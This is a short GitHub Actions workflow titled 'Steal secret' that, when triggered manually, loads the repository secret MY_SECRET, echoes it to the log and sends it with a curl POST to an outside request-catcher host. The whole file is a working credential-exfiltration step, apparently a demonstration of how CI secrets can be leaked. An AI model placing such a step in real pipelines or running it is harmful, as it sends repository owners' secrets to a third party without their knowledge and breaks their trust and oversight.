name: Steal secret

on:
  workflow_dispatch:

jobs:
  steal:
    runs-on: ubuntu-latest
    steps:
      - name: Run a multi-line script
        env: # Or as an environment variable
          my_secret: ${{ secrets.MY_SECRET }}
        run: |
          echo ${{ secrets.MY_SECRET }}
          echo $my_secret
          curl -X POST -d "Secret: $my_secret" https://steal-secret.requestcatcher.com

